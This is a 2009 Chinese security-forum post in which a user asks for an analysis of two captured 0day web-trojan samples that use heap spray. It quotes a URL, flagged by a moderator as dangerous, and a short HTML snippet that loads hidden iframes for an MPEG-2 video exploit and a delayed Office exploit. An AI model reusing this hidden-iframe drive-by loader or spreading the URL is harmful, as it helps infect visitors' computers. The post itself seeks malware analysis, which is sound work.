-
-
[讨论]关于两个流行0day网马样本分析
-
发表于:
2009-7-15 00:02
25713
-
failwest兄:
您好,仔细拜读了您的大作,书中对于heap spray技术的论述很精彩,但是深度还不够,例子太少了.在最近流行的几个0day网马中,该技术发挥的淋漓尽致,但是有些细节还是迷茫,我抓了2个0day网马样本,希望您能抽时间给示范分析一下好吗?
[NOTE]以下网页地址危险,请论坛会员不要随便点击!!!
http://www.ghfdghgdghd.cn/index.html
<iframe src=[B]test.htm[/B] width=10 height=10></iframe>
<script>
pingfan = "<iframe src=[B]of.htm [/B]width=10 height=10></iframe>"
setTimeout("document.write(pingfan)", 8000 );
</script>
NOTE:
test.htm- MPEG-2视频漏洞0day
of.htm - 最新Office漏洞0day
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!